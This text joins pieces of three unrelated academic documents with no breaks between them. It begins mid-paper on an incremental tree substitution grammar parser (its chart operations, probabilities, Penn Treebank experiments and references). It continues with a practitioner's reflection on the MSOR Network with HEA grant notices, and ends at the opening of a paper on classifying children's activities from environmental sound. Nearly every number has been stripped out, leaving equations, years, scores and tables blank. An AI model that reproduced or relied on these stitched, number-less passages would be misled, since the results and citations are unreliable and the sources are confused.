discuss its probabilistic component in section . . in line with the generative process illustrated in section . , the parser operates on the chart states in order to keep track of all pos- sible itsg derivations as new words are fed in. it starts by reading the first word ` and introducing new states to state-set in the chart, those mapping to initial fragments in the grammar with ` as lexi- cal anchor. at a given stage, after i words have been scanned, the parser reads the next word (`i) and in- troduces new states in state-sets i and i + by apply- ing specific operations on states present in the chart, and fringes in the grammar. parser operations the parser begins with the start operation just described, and continues with a cycle of four operations for every word in the input sentence `i (for i ≥ ). the order of the four opera- tions is the following: completion, backward substi- tution ( ), forward substitution ( ), and scan. when there are no more words in input, the parser termi- nates with a stop operation. we will now describe the parser operations (see figure for their formal definition), ignoring the probabilities for now. start(` ): for every initial fringe in the grammar anchored in ` , the parser inserts a (scan) state for that fringe in the state-set . backward substitution(`i) applies to acceptor states, i.e., those with a substitution site following the dot, say x . for each acceptor state in state-set i, and any lex-first fringe in the grammar rooted in x and anchored in `i, the parser inserts a (scan) state for that fringe in state-set i. forward substitution(`i) applies to donor states, i.e., those that have no elements following the dot and with start index . for each donor state in state-set i, rooted in y , and any sub-first fringe in the grammar with y as the left-most element in its yield, the parser inserts a (scan) state for that fringe in state-set i, with the dot placed after y . completion applies to complete states, i.e., those with no elements following the dot and with start index j > . for every complete state in state-set i, rooted in y , with starting index j, and every acceptor state in set j with y following the dot, the parser inserts a copy of the acceptor state in state-set i, and advances the dot. scan(`i) applies to scan states, i.e., those with a word after the dot. for every scan state in state-set i having `i after the dot, the parser inserts a copy of that state in state-set (i + ), and advances the dot. stop(#) is a special type of forward substitution and applies to donor states, but only when the input word is the terminal symbol #. for every donor state in state-set n (the length of the sentence), if the root of the fringe’s state is y , the parser introduces a stop state whose fringe is a stop fringe with y as the left most substitution site. comparison with the earley algorithm it is useful to clarify the differences between the pro- posed itsg parsing algorithm and the original ear- ley algorithm. primarily, the itsg parser is based on a left-right processing order, whereas the ear- ley algorithm uses a top-down generative process. moreover, our parser presupposes a restricted in- ventory of fragments in the grammar (the ones al- lowed by an itsg) as opposed to the general cfg rules allowed by the earley algorithm. in particular, the backward substitution operation is more limited than the corresponding prediction step of the earley algorithm: only lex-first fragments can be introduced using backward substitution, and therefore left re- cursion (allowed by the earley algorithm) is not pos- sible here. this restriction is compensated for by the existence of the forward substitution operation, which has no analog in the earley algorithm. the worst case complexity of earley algorithm is domi- nated by the completion operation which is identical to that in our parser, and therefore the original total time complexity applies, i.e., o(l ) for an input sen- tence of length l, and o(n ) in terms of the number of non-lexical nodes n in the grammar. derivations incremental (partial) derivations are represented in the chart as (partial) paths along states. each state can lead to one or more succes- sors, and come from one or more antecedents. scan is the only operation which introduces, for every scan state, a new single successor state (which can be of any of the four types) in the following state- set. complete states may lead to several states within the current state-set, which may belong to any of the four types. an acceptor state may lead to a number of scan states via backward substitution (depending on the number of lex-first fringes that can combine with it). similarly, a donor state may lead to a num- ber of scan states via forward substitution. after i words have been scanned, we can retrieve (partial) paths from the chart. this is done in a back- ward direction starting from scan states in state-set i all the way back to the initial states. this is possible since all the operations are reversible, i.e., given a state it is possible to retrieve its antecedent state(s). as an example, consider the itsg grammar con- sisting of the fragments in figure and the two de- rivations of the same parse tree in the same figure; figure represents the parsing chart of the same grammar, containing the two corresponding paths. . probabilistic parser in the probabilistic version of the parser, each fringe in the grammar has a given probability, such that equations ( )–( ) are satisfied. in the probabilistic chart, every state i : kx �λ•µ is decorated with three this further simplifies the probabilistic version of our parser, as there is no need to resort to the probabilistic reflex- ive, transitive left-corner relation described by stolcke ( ). this operation would violate earley’s top-down constraint; donor states are in fact the terminal states in earley algorithm. the probability of an ambiguous fringe is the marginal probability of the fragments mapping to it. – “terms” s | np �• “terms” [ / , / , ] || s �• “terms” s@ [ / , / , ] – “were” s | s � np • “were” v p “.” [ / , / , ] || s@ �• “were” v p “.” [ / , , / ] || s � “terms” • s@ [ / , / , ] ∗ || s@ � “were” v p “.” [ ] | np � “terms” • [ / , / , ] | s � np “were” v p “.” [ ] – “disclosed” s v p �• “disclosed” [ , , ] | s � np “were” • v p “.” [ / , / , ] ∗∗ || s@ � “were” • v p “.” [ / , , / ] ∗∗∗ v p � “disclosed” [ ] – “.” s | s � np “were” v p • “.” [ / , / , ] || s@ � “were” v p • “.” [ / , , / ] c v p � “disclosed” • [ , , ] | ** || *** – # s ∅� s • # [ , , ] � || s � “terms” s@ • [ / , / , ] | s � np “were” v p “.” • [ / , / , ] ∅� s # [ ] c || s@ � “were” v p “.” • [ / , , / ] || * figure : the parsing chart of the two derivations in figure . blue states or fringes (also marked with |) are the ones in the first derivation, red (||) in the second, and yellow (no marks) are the ones in common. each state-set is represented as a separate block in the chart, headed by the state-set index and the next word. each row maps to a chart operation (specified in the first column, with s and c standing for ‘scan’ and ‘complete’ respectively) and follows the same notation of figure . symbols ∗ are used as state placeholders. probabilities [α,γ,β] as shown in the chart example in figure . • the forward probability α is the marginal prob- ability of all the paths starting with an initial state, scanning all initial words in the sentence until `i− included, and passing through the current state. • the inner probability γ is the marginal proba- bility of all the paths passing through the state k : kx �•λµ, scanning words `k,...,`i− and passing through the current state. • the outer probability β is the marginal prob- ability of all the paths starting with an initial state, scanning all initial words in the sentence until `k− included, passing through the current state, and reaching a stop state. forward (α) and inner (γ) probabilities are propa- gated while filling the chart incrementally, whereas outer probabilities (β) are back-propagated from the stop states, for which β = (see figure ). these probabilities are used for computing prefix and sen- tence probabilities, and for obtaining the most prob- able partial derivation (mpd) of a prefix, the mpd of a sentence, its minimum risk parse (mrp), and to approximate its most probable parse (mpp). prefix probabilities are obtained by summing over the forward probabilities of all scan states in state-set i having `i after the dot: p(` ,...,`i) = ∑ state s i:k x�λ•`iµ α(s) ( ) . most probable derivation (mpd) the most probable (partial) derivation (mpd) can be obtained from the chart by backtracking the viterbi path. viterbi forward and inner probabilities sentence probability is obtained by marginalizing the for- ward probabilities of the stop states in the last state-set n. (α∗,γ∗) are propagated as standard forward and in- ner probabilities except that summation is replaced by maximization, and the probability of an ambigu- ous fringe is the maximum probability among all the fragments mapping into it (instead of the marginal one). the viterbi partial path for the prefix ` ,...,`i can then be retrieved by backtracking from the scan state in state-set i with max α∗: for each state, the most probable preceding state is retrieved, i.e., the state among its antecedents with maximum α∗. the viterbi complete path of a sentence can be obtained by backtracking the viterbi path from the stop state with max α∗. given a viterbi path, it is possible to obtain the corresponding mpd. this is done by re- trieving the associated sequence of fragments and connecting them. . most probable parse (mpp) according to equation ( ), if we want to compute the mpp we need to retrieve all possible derivations of the current sentence, sum up the probabilities of those generating the same tree, and returning the tree with max marginal probability. unfortunately the number of possible derivations grows exponen- tially with the length of the sentence, and computing the exact mpp is np-hard (sima’an, ). in our implementation, we approximate the mpp by per- forming this marginalization over the viterbi-best derivations obtained from all stop states in the chart. . minimum risk parse (mrp) mpd and mpp aim at obtaining the structure of a sentence which is more likely as a whole under the current probabilistic model. alternatively, we may want to focus on the single components of a tree structures, e.g., cfg rules covering a certain span of the sentence, and search for the structure which has the highest number of correct constituents, as pro- posed by goodman ( ). such structure is more likely to obtain higher results according to standard parsing evaluations, as the objective being maxi- mized is closely related to the metric used for eval- uation (recall/precision on the number of correct la- beled constituents). for each scan state in the path, we obtain the fragment in the grammar that maps into the state’s fringe. for ambiguous fringes the most probable fragment that maps into it is selected. in order to obtain the minimum risk parse (mrp) we utilize both inner (γ) and outer (β) probabilities. the product of these two probabilities equals the marginal probability of all paths generating the en- tire current sentence and passing through the current state. we can therefore compute the probability of a fringe f = x � λ•µ covering a specific span [s,t] of the sentence: p( f ,[s,t]) = γ(t : s f•)·β(t : s f•) ( ) we can then compute the probability of each frag- ment spanning [s,t], and the probability p(r,[s,t]) of a cfg-rule r spanning [s,t]. finally the mrp is computed as mrp = arg max t ∏ r∈t p(r,[s,t]) ( ) experiments for training and evaluating the itsg parser, we em- ploy the penn wsj treebank (marcus et al., ). we use sections – for training, section and for development and section for testing. . grammar extraction following standard practice, we start with some pre- processing of the treebank. after removing traces and functional tags, we apply right binarization on the training treebank (klein and manning, ), with no horizontal and vertical conditioning. this means that when a node x has more than two chil- dren, new artificial constituents labeled x @ are cre- ated in a right recursive fashion (see figure ). we then replace words appearing less than five times in the training data by one of unknown word cate- gories based on the presence of lexical features as described in petrov ( ). fragment extraction in order to equip the gram- mar with a representative set of lexicalized frag- ments, we use the extraction algorithm of sangati for an ambiguous fringe, the spanning probability of each fragment mapping into it is the fraction of the fringe’s spanning probability with respect to the marginal fringe probability. marginalizing the probabilities of all fragments having r spanning [s,t]. this shallow binarization (h v ) was used based on gold coverage of the unsmoothed grammar (extracted from the train- ing set) on trees in section : h v binarization results on a coverage of . % of the trees, compared to . % for h v . et al. ( ) which finds maximal fragments recur- ring twice or more in the training treebank. to en- sure better coverage, we additionally extract one- word fragments from each training parse tree: for each lexical node ` in the parse tree we percolate up till the root node, and for every encountered in- ternal node x ,x ,...,xi we extract the lexicalized fragment whose spine is xi − xi− − ...− x −`, and where all the remaining children of the inter- nal nodes are substitution sites (see for instance the right fragment in figure ). finally, we remove all fragments which do not comply with the restrictions presented in section . . for each extracted fragment we keep track of its frequency, i.e., the number of times it occurs in the training corpus. each fragment’s probability is then derived according to its relative frequency in the corresponding set of fragments ( finit, f xlex, f y sub), so that equations( )–( ) are satisfied. the final gram- mar consists of . m fragments mapping to . m fringes. smoothing two types of smoothing are per- formed over the grammar’s fragments: open class smoothing adds simple cfg rewriting rules to the grammar for open-class 〈pos,word〉 pairs not en- countered in the training corpus, with frequency − . initial fragments smoothing adds each lex-first fragment f to the initial fragment set with frequency − ·freq( f ). all itsg experiments we report used exhaustive search (no beam was used to prune the search space). . evaluation in addition to standard full-sentence parsing results, we propose a novel way of evaluating our itsg on partial trees, i.e., those that the parser constructs for sentence prefixes. more precisely, for each prefix of the input sentence (length two words or longer) we compute the parsing accuracy on the minimal struc- ture spanning that prefix. the minimal structure is obtained from the subtree rooted in the minimum the fragment with no lexical items, and those with more than one substitution site at the beginning of the yield. a pos belongs to the open class if it rewrites to at least different words in the training corpus. a word belongs to the open class if it has been seen only with open-class pos tags. the parameters were tuned on section of the wsj. common ancestor of the prefix nodes, after pruning those nodes not yielding any word in the prefix. as observed in the example derivations of fig- ure , our itsg generates partial trees for a given prefix which may include predictions about unseen parts of the sentence. we propose three new mea- sures for evaluating sentence prediction: word prediction prd(m): for every prefix of each test sentence, if the model predicts m′ ≥ m words, the prediction is correct if the first m pre- dicted words are identical to the m words following the prefix in the original sentence. word presence prs(m): for every prefix of each test sentence, if the model predicts m′ ≥ m words, the prediction is correct if the first m predicted words are present, in the same order, in the words following the prefix in the original sentence (i.e., the predicted word sequence is a subsequence of the sequence of words following the prefix). longest common subsequence lcs: for every prefix of each test sentence, it computes the longest common subsequence between the sequence of pre- dicted words (possibly none) and the words follow- ing the prefix in the original sentence. recall and precision can be computed in the usual way for these three measures. recall is the total number (over all prefixes) of correctly predicted words (as defined by prd(m), prs(m), or lcs) over the total number of words expected to be pre- dicted (according to m), while precision is the num- ber of correctly predicted words over the number of words predicted by the model. we compare the itsg parser with the incremental parsers of schuler et al. ( ) and demberg et al. ( ) for full-sentence parsing, with the roark ( ) parser for full-sentence and partial pars- we also evaluated our itsg model using perplexity; the results obtained were substantially worse than those obtained using roark’s parsers. note that neither prd(m) nor prs(m) correspond to word error rate (wer). prd requires the predicted word sequence to be identical to the original sequence, while prs only requires the predicted words to be present in the original. in contrast, wer measures the minimum number of substitutions, inser- tions, and deletions needed to transform the predicted sequence into the original sequence. apart from reporting the results in roark ( ), we also run the latest version of roark’s parser, used in roark et al. ( ), which has higher results compared to the original work. r p f demberg et al. ( ) . . . schuler et al. ( ) . . . roark ( ) . . . roark et al. ( ) . . . itsg (mpd) . . . itsg (mpp) . . . itsg (mrp) . . . itsg smoothing (mpd) . . . itsg smoothing (mpp) . . . itsg smoothing (mrp) . . . table : full-sentence parsing results for sentences in the test set of length up to words. ing, and with a language model built using srilm (stolcke, ) for sentence prediction. we used a standard -gram model trained on the sentences of the training set using the default setting and smooth- ing (kneser-ney) provided by the srilm pack- age. (higher n-gram model do not seem appropriate, given the small size of the training corpus.) for ev- ery prefix in the test set we compute the most prob- able continuation predicted by the n-gram model. . results table reports full-sentence parsing results for our parser and three comparable incremental parsers from the literature. while roark ( ) obtains the best results, the itsg parser without smoothing per- forms on a par with schuler et al. ( ), and out- performs demberg et al. ( ). adding smooth- ing results in a gain of . points f-score over the schuler parser. when we compare the different pars- ing objectives of the itsg parser, mrp is the best one, followed by mpp and mpd. incremental parsing the graphs in figure com- pare the itsg and roark’s parser on the incremental parsing evaluation, when parsing sentences of length , , and . the performance of both models declines as the length of the prefix increases, with roark’s parser outperforming the itsg parser on average, although the itsg parser seems more com- we used a modified version of a script by nathaniel smith available at https://github.com/njsmith/pysrilm. note that the scores reported by demberg et al. ( ) are for tag structures, not for the original penn treebank trees. prefix length f- sc or e roark (last) itsg smooth. (mpd) roark et al. ( ) prefix length f- sc or e roark (last) itsg smooth. (mpd)itsg smooth. (mpd) f -s co re prefix length figure : partial parsing results for sentences of length , , , and (from upper left to lower right). petitive when parsing prefixes for longer (and there- fore more difficult) sentences. sentence prediction table compares the sen- tence prediction results of the itsg and the lan- guage model (srilm). the latter is outperforming the former when predicting the next word of a pre- fix, i.e. prd( ), whereas itsg is better than the lan- guage model at predicting a single future word, i.e. prs( ). when more than one (consecutive) word is considered, the srilm model exhibits a slightly better recall while itsg achieves a large gain in pre- cision. this illustrates the complementary nature of the two models: while the language model is better at predicting the next word, the itsg predicts future words (rarely adjacent to the prefix) with high con- fidence ( . % lcs precision). however, it makes predictions for only a small number of words ( . % lcs recall). examples of sentence predictions can be found in table . related work to the best of our knowledge, there are no other in- cremental tsg parsers in the literature. the parser of demberg et al. ( ) is closely related, but uses tree-adjoining grammar, which includes both sub- stitution and adjunction. that parser makes predic- tions, but only for upcoming structure, not for up- coming words, and thus cannot be used directly for sentence prediction. the incremental parser of roark ( ) uses a top-down algorithm and works itsg srilm correct r p correct r p prd( ) , . . , . . prd( ) . . , . . prd( ) . . . . prd( ) . . . . prs( ) , . . , . . prs( ) , . . , . . prs( ) , . . , . . prs( ) . . . . lcs , . . , . . table : sentence prediction results. prefix shares of ual , the parent prd( ) prs( ) itsg company of united airlines , − − srilm company , which is the − − goldstd of united airlines , were extremely active all day friday . prefix pse said it expects to report earnings of $ . million to $ . million , or itsg cents a share , − + srilm % to $ unk − − goldstd cents to cents a share . table : examples comparing sentence predictions for itsg and srilm (unk: unknown word). on the basis of context-free rules. these are aug- mented with a large number of non-local fea- tures (e.g., grandparent categories). our approach avoids the need for such additional features, as tsg fragments naturally contain non-local informa- tion. roark’s parser outperforms ours in both full- sentence and incremental f-score (see section ), but cannot be used for sentence prediction straight- forwardly: to obtain a prediction for the next word, we would need to compute an argmax over the whole vocabulary, then iterate this for each word af- ter that (the same is true for the parsers of schuler et al., and demberg et al., ). most in- cremental dependency parsers use a discriminative model over parse actions (nivre, ), and there- fore cannot predict upcoming words either (but see huang and sagae ). turning to the literature on sentence prediction, we note that ours is the first attempt to use a parser for this task. existing approaches either use n-gram models (eng and eisner, ; bickel et al., ) or a retrieval approach in which the best matching sen- tence is identified from a sentence collection given a set of features (grabski and scheffer, ). there is also work combining n-gram models with lexical semantics (li and hirst, ) or part-of-speech in- formation (fazly and hirst, ). in the language modeling literature, more sophis- ticated models than simple n-gram models have been developed in the past few years, and these could potentially improve sentence prediction. ex- amples include syntactic language models which have applied successfully for speech recognition (chelba and jelinek, ; xu et al., ) and ma- chine translation (schwartz et al., ; tan et al., ), as well as discriminative language models (mikolov et al., ; roark et al., ). future work should evaluate these approaches against the itsg model proposed here. conclusions we have presented the first incremental parser for tree substitution grammar. incrementality is moti- vated by psycholinguistic findings, and by the need for real-time interpretation in nlp. we have shown that our parser performs competitively on both full sentence and sentence prefix f-score. we also intro- duced sentence prediction as a new way of evaluat- ing incremental parsers, and demonstrated that our parser outperforms an n-gram model in predicting more than one upcoming word. the performance of our approach is likely to im- prove by implementing better binarization and more advanced smoothing. also, our model currently con- tains no conditioning on lexical information, which is also likely to yield a performance gain. finally, future work could involve replacing the relative fre- quency estimator that we use with more sophisti- cated estimation schemes. acknowledgments this work was funded by epsrc grant ep/i / “an integrated model of syntac- tic and semantic prediction in human language processing”. we are grateful to brian roark for clarifying correspondence and for guidance in using his incremental parser. we would also like to thank katja abramova, vera demberg, mirella lapata, andreas van cranenburgh, and three anonymous reviewers for useful comments. references alfred v. aho and jeffrey d. ullman. . the theory of parsing, translation, and compiling. prentice-hall, inc., upper saddle river, nj. gerry t. m. altmann and yuki kamide. . incre- mental interpretation at verbs: restricting the do- main of subsequent reference. cognition, : – . steffen bickel, peter haider, and tobias scheffer. . predicting sentences using n-gram lan- guage models. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – . vancouver. rens bod. . the problem of computing the most probable tree in data-oriented parsing and stochastic tree grammars. in proceedings of the th conference of the european chapter of the association for computational linguistics, pages – . association for computer linguistics, dublin. rens bod, khalil sima’an, and remko scha. . data-oriented parsing. university of chicago press, chicago, il. ciprian chelba and frederick jelinek. . struc- tured language modeling. computer speech and language, : – . vera demberg and frank keller. . data from eye-tracking corpora as evidence for theories of syntactic processing complexity. cognition, ( ): – . vera demberg, frank keller, and alexander koller. . parsing with psycholinguistically moti- vated tree-adjoining grammar. computational linguistics, ( ). in press. jay earley. . an efficient context-free pars- ing algorithm. communications of the acm, ( ): – . john eng and jason m. eisner. . radiology report entry with automatic phrase completion driven by language modeling. radiographics, ( ): – . afsaneh fazly and graeme hirst. . testing the efficacy of part-of-speech information in word completion. in proceedings of the eacl work- shop on language modeling for text entry meth- ods, pages – . budapest. joshua goodman. . parsing algorithms and metrics. in proceedings of the th annual meet- ing on association for computational linguistics, pages – . association for computational linguistics, santa cruz. korinna grabski and tobias scheffer. . sen- tence completion. in proceedings of the th an- nual international acm sir conference on re- search and development in information retrieval, pages – . sheffield. liang huang and kenji sagae. . dynamic pro- gramming for linear-time incremental parsing. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computational lin- guistics, uppsala. dan klein and christopher d. manning. . ac- curate unlexicalized parsing. in proceedings of the st annual meeting on association for com- putational linguistics, pages – . associa- tion for computational linguistics, sapporo. jianhua li and graeme hirst. . semantic knowledge in a word completion task. in pro- ceedings of the th international acm sigac- cess conference on computers and accessibil- ity, pages – . baltimore. mitchell p. marcus, mary ann marcinkiewicz, and beatrice santorini. . building a large anno- tated corpus of english: the penn treebank. com- putational linguistics, ( ): – . tomas mikolov, martin karafiat, jan cernocky, and sanjeev. . recurrent neural network based language model. in proceedings of the th annual conference of the international speech communication association, pages – . florence. joakim nivre. . incremental non-projective dependency parsing. in proceedings of human language technologies: the annual conference of the north american chapter of the associa- tion for computational linguistics, pages – . association for computational linguistics, rochester. slav petrov. . coarse-to-fine natural lan- guage processing. ph.d. thesis, university of california at bekeley, berkeley, ca. brian roark. . probabilistic top-down parsing and language modeling. computational linguis- tistics, : – . brian roark, asaf bachrach, carlos cardenas, and christophe pallier. . deriving lexical and syntactic expectation-based measures for psy- cholinguistic modeling via incremental top-down parsing. in proceedings of the conference on em- pirical methods in natural language processing, pages – . association for computational linguistics, singapore. brian roark, murat saraclar, and michael collins. . discriminative n-gram language modeling. computer speech and language, ( ): – . d. j. rosenkrantz and p. m. lewis. . deter- ministic left corner parsing. in proceedings of the th annual symposium on switching and au- tomata theory, pages – . ieee computer society, washington, dc. federico sangati, willem zuidema, and rens bod. . efficiently extract recurring tree fragments from large treebanks. in nicoletta calzolari, khalid choukri, bente maegaard, joseph mar- iani, jan odijk, stelios piperidis, mike rosner, and daniel tapias, editors, proceedings of the th internationalconference on language resources and evaluation. european language resources association, valletta, malta. yves schabes. . mathematical and computa- tional aspects of lexicalized grammars. ph.d. thesis, university of pennsylvania, philadelphia, pa. william schuler, samir abdelrahman, tim miller, and lane schwartz. . broad-coverage pars- ing using human-like memory constraints. com- putational linguististics, ( ): – . lane schwartz, chris callison-burch, william schuler, and stephen wu. . incremental syn- tactic language models for phrase-based transla- tion. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, volume , pages – . association for computational linguis- tics, portland, or. khalil sima’an. . computational complexity of probabilistic disambiguation by means of tree- grammars. in proceedings of the th confer- ence on computational linguistics, pages – . association for computational linguistics, copenhagen. andreas stolcke. . an efficient probabilis- tic context-free parsing algorithm that computes prefix probabilities. computational linguistics, ( ): – . andreas stolcke. . srilm – an extensible lan- guage modeling toolkit. in proceedings interna- tional conference on spoken language process- ing, pages – . denver, co. scott c. stoness, joel tetreault, and james allen. . incremental parsing with reference inter- action. in frank keller, stephen clark, matthew crocker, and mark steedman, editors, proceed- ings of the acl workshop incremental parsing: bringing engineering and cognition together, pages – . association for computational lin- guistics, barcelona. ming tan, wenli zhou, lei zheng, and shaojun wang. . a large scale distributed syntac- tic, semantic and lexical language model for ma- chine translation. in proceedings of the th annual meeting of the association for compu- tational linguistics: human language technolo- gies, volume , pages – . association for computational linguistics, portland, or. michael k. tanenhaus, michael j. spivey- knowlton, kathleen m. eberhard, and julie c. sedivy. . integration of visual and linguistic information in spoken language comprehension. science, : – . peng xu, ciprian chelba, and frederick jelinek. . a study on richer syntactic dependencies for structured language modeling. in proceedings of the th annual meeting on association for computational linguistics, pages – . as- sociation for computational linguistics, philadel- phia. msor connections vol no summer � first steps when the msor network was formed in i was a first year undergraduate student of mathematics at the university of nottingham with, typically, no idea what i wanted to do afterwards. after graduating in i was recruited by stephen hibberd and cliff litton at nottingham to develop their virtual learning environment for service mathematics called melees. this appointment was for four months before i started a masters degree in computing and was my first experience of he mathematics from the point of view of the teacher. the first published article with my name on it anywhere was an account of the implementation of melees in msor connections in [ ]. later that year pam bishop published a report i wrote on the state of mathml implementation in current web browsers on the msor network website [ ]. encouraged by this, in i submitted an account of my msc dissertation [ ], on e-assessment in mathematics, to cliff beevers’ maths-caa series which was published online by the msor network from - . disability my interest in mathml led me to issues of accessibility. my first solo article in msor connections [ ], submitted with confidence gained from my earlier publishing experiences, was a short piece in about a new version of mathplayer which could convert mathml to speech. this was an entry in the ‘have you seen this...?’ series, which offered a quick publishing route for short items that might not warrant an in depth article but were worth bringing to wider attention. it was also listed as ‘dda update’, a series which provided disability-related updates in response to new legislation. in my now-wife emma and i re-launched the ‘dda update’ series of articles [ ], re-titling this partly to reflect changes to the legislation but mostly to move the focus from the negative – legislative necessity – to focus on ‘supporting disabled students’. in , following an invitation from michael grove, i formed a working group ‘accessing maths, stats and or’ (accessmsor) to take an interest in disability matters. we sent a general invitation for interested people to come to nottingham trent university for a wide-ranging discussion on disability and msor. this initial meeting was reported, of course, in msor connections [ ]. around this time emma and i, with michael whapples, received funding through the msor network mini-projects scheme to investigate visual impairment and particularly the use of braille to communicate mathematics. we took a paper based on this project to the cetl-msor conference and this was published in msor connections [ ]. peter rowlett msor network university of birmingham p.rowlett@bham.ac.uk early career connections with msor peter rowlett msor connections vol no summer � my final act as chair of the working group was to run a one- day workshop giving the findings of our project and others doing similar work. afterwards, we published contributions from speakers through msor connections [ ]. technology given my interest in mathml and related technologies, i initiated a new series of articles in msor connections in on mathml and xml technologies [ ]. i wrote other articles about different technologies, graphics [ ], blogging [ ] and video [ ], in and . these contributions are descriptive, written from the point of view of the uncritical enthusiast. they basically assume that you might want to use these technologies and offer a guide of how to do so. in i started travelling around the uk for the institute of mathematics and its applications (ima). this exposed me to different approaches taken at many institutions and led to many tearoom chats with mathematics lecturers about their practice. some had read an article i had written in connections and were interested to learn more, others were interested in how departments i had visited approached the issues they were having. in i started working again for the university of nottingham, this time in a more general role supporting lecturers in their teaching through technology. exposure to different approaches and the need to answer questions such as ‘why would i want to introduce this technology into my teaching?’ led me to lose some of my wide-eyed enthusiasm and take an interest in questions of why we might use technology in education. the first evidence of this change in print came with an article in msor connections in about response system use [ ]. this took a sceptical look at the technology and asked when, and indeed if, this technology could be used effectively. interest in this led to a study at nottingham of student reaction to response system use, presented at the cetl-msor conference and published in its proceedings [ ]. a later contribution to msor connections took a similar approach to lecture capture technology [ ]. now and next later in i started working for the msor network on a project in mathematical sciences he curriculum innovation as part of the national he stem programme, reported regularly through msor connections [ ]. in , as part of this, i was lucky enough to edit a special issue with contributions from some of the work we are supporting [ ]. my interest in higher education mathematics is quite practical – i hope to improve my own practice and help others develop theirs. i think it is extremely valuable for our community to have somewhere to place practitioner articles that might not be suitable for a full research journal. in connections, people could present the implementation of ideas in development, as we did with melees, or provide quick pointers to items of note, as i did with mathplayer. articles could be published giving simple examples of use of technologies, such as the ones i wrote on graphics, blogging and video, or attempts to read around a topic, as with the articles on response systems and lecture capture. msor connections also saw interesting opinion pieces by established expert practitioners, grounded in experience rather than research literature but interesting to reflect on and learn from nonetheless. it is interesting, too, to look back and reflect on the wider impact of work that started in msor connections. the gathering of the accessmsor community (still going strong under new chair emma cliffe) and the research project into the experiences of students with visual impairments would likely not have occurred, thematically and practically, without us first publishing articles on disability through connections. writing those early naive articles on technology implementation led to interesting discussions and drew me to a point in my career where i would begin to question the effectiveness of such technologies in a way i hope is useful. critically evaluating response systems in connections led to a research investigation and a cetl- msor conference paper. many times, writing an article for connections has driven me to think about a topic in depth and genuinely learn and develop myself. (and i haven’t even mentioned reading articles!) while the msor network has existed, i have gone from undergraduate student to be involved with delivering teaching, from uncritical technology enthusiast to take a broader interest in higher education mathematics and how technology and other aspects can work together to improve learning and the student experience. it now seems almost certain i will be with the msor network at the end. the work of the network will continue through the hea discipline lead and i am delighted to hear that msor connections will continue too. where i go from here, professionally, is quite uncertain but i feel positive that i go there very much the better for my experience interacting with the msor network and its connections. references hibberd, s., litton, c., chambers, c. and rowlett, p., . melees – e-support or mayhem? msor connections, ( ), pp. - . rowlett, p., . mathml: the current state of play [online]. msor network. available via: http://mathstore.ac.uk/mathml/rowlett.html [last accessed / / ]. rowlett, p.j., . pseudo-randomised caa by “preprocessing” mathml. maths-caa series [online], september. available via: http://www.mathstore.ac.uk/ repository/mathscaa_sep .pdf [last accessed / / ]. . . . early career connections with msor – peter rowlett msor connections vol no summer � rowlett, p., . mathplayer and the design science mathematics accessibility project. msor connections, ( ), p. . wright, e.j. and rowlett, p.j., . introducing the supporting students with disabilities series: disability legislation update. msor connections, ( ), pp. - . rowlett, e.j., rowlett, p.j. and surowiec, r., . accessmsor: report on inaugural meeting. msor connections, ( ), p. . rowlett, e.j. and rowlett, p.j., . visual impairment in msor. msor connections, ( ), pp. - . rowlett, p. et al., . workshop report…visual impairment in maths, stats and operational research (msor). msor connections, ( ), pp. - . rowlett, p.j., . mathml/xml series: an introduction. msor connections, ( ), pp. - . rowlett, p.j., . a simple example of dynamic graphics. msor connections, ( ), pp. - . rowlett, p.j., . some approaches to mathematical blogging. msor connections, ( ), pp. - . rowlett, p.j., . a quick and easy (rough and ready) method for online video. msor connections, ( ), pp. - . rowlett, p., . ask the audience (yes, all of them). msor connections, ( ), pp. - . barton, s. and rowlett, p., . using an audience response system – what do the audience do with the feedback? proceedings of the cetl-msor conference , university of birmingham, th- th september , pp. - . rowlett, p., . lecture capture technology – technically possible, but can it be used effectively? msor connections, ( ), pp. - . rowlett, p., . introducing the mathematical sciences he curriculum innovation project. msor connections, ( ), p. . rowlett, p. (ed.), . msor connections, ( ). . . . . . . . . . . . . . . early career connections with msor – peter rowlett the hea is currently inviting subscribing institutions in the uk delivering higher education to participate as part of the discipline workshop and seminar series for - . grants of £ are being offered to institutions wishing to host and deliver a workshop or seminar on teaching and learning in the mathematics, statistics and operational research discipline and to produce an associated report for the sector. in order to participate in the scheme a proposal form needs to be submitted to seminarseries@heacademy.ac.uk by september . the proposal form is available at http://www.heacademy.ac.uk/seminar-series, where more detailed information about the scheme can also be found. hea discipline workshops and seminars the next call for hea teaching development grants opens on tuesday august. the call will be for departmental grants of up to £ , , with a submission deadline on thursday september. % of the funding will be for projects in the areas of (i) assessment and feedback and (ii) flexible learning. the remaining % will be allocated to an open call for innovative pedagogic work. details of the scheme can be found at http://www.heacademy.ac.uk/tdg. a further call for collaborative teaching development grants will open in january . hea teaching development grants deep artificial neural network based on environmental sound data for the generation of a children activity classification model deep artificial neural network based on environmental sound data for the generation of a children activity classification model antonio garcía-domínguez ,*, carlos e. galvan-tejada ,*, laura a. zanella-calzada , hamurabi gamboa , jorge i. galván-tejada , josé maría celaya padilla , huizilopoztli luna-garcía , jose g. arceo-olague and rafael magallanes-quintanar unidad académica de ingeniería eléctrica, universidad autónoma de zacatecas, zacatecas, zacatecas, méxico loria, université de lorraine, nancy, france conacyt, universidad autónoma de zacatecas, zacatecas, zacatecas, méxico * these authors contributed equally to this work. abstract children activity recognition (car) is a subject for which numerous works have been developed in recent years, most of them focused on monitoring and safety. commonly, these works use as data source different types of sensors that can interfere with the natural behavior of children, since these sensors are embedded in their clothes. this article proposes the use of environmental sound data for the creation of a children activity classification model, through the development of a deep artificial neural network (ann). initially, the ann architecture is proposed, specifying its parameters and defining the necessary values for the creation of the classification model. the ann is trained and tested in two ways: using a – approach ( % of the data for training and % for testing) and with a k-fold cross- validation approach. according to the results obtained in the two validation processes ( – splitting and k-fold cross validation), the ann with the proposed architecture achieves an accuracy of . % and . %, respectively, which allows to conclude that the developed model using the ann and its proposed architecture achieves significant accuracy in the children activity classification by analyzing environmental sound. subjects artificial intelligence, data mining and machine learning, data science keywords children activity recognition, environmental sound, machine learning, deep artificial neural network, environmental intelligence, human activity recognition introduction environmental intelligence is an area of artificial intelligence that has made great progress in recent years (cook, augusto & jakkula, ), mainly driven by the development of new devices and sensors that facilitate data capture and processing (stipanicev, bodrozic & stula, ). advances in this area have gone hand in hand with the development of the internet of things (iot) (wortmann & flüchter, ; li, da xu & zhao, ) and smart cities (albino, berardi & dangelico, ; arasteh et al., ), in which can 